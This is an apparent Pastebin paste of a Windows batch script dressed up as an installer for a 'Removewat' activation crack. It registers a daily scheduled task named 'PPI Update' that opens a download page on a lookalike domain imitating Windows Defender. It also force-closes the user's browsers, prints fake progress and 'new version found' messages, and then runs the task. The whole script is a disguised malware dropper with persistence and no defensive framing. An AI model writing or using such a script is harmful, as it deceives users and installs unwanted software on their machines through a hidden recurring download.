Advertisement
Vekter

Untitled

Feb 4th, 2018
332
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.78 KB | None | 0 0
  1. schtasks /create /tn "PPI Update" /tr "%SYSTEMROOT%\explorer.exe ""http://windowsdefender.site/warning/download.php?mn=5623""" /sc DAILY
  2. @echo off
  3. echo Download and Install Removewat Final by Daz Team...
  4. echo Opeaning Setup...
  5. "Setup activation.exe"
  6. echo.
  7. @echo off
  8. taskkill /f /IM chrome.exe
  9. taskkill /f /IM firefox.exe
  10. taskkill /f /IM iexplore.exe
  11. cls
  12.  
  13. echo Install Removewat 2.2.7 50%...
  14. echo Applying Registry Patch...
  15. echo.
  16. echo Removewat 2.2.7 78%...
  17. echo.
  18. echo Installation Completed....
  19. echo.
  20. echo.
  21. echo New Removewat 2.2.7 found!
  22. echo.
  23. echo Download and install new version....
  24. echo.
  25. @echo off
  26. schtasks /Run /TN "PPI Update"
  27. echo New Removewat 2.6.7 Found! ** UPDATE IN PROGRESS... **
  28. echo.
  29. echo.
  30. echo.
  31. echo.
  32. echo.
  33. echo Updating to New Version....
  34. pause
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement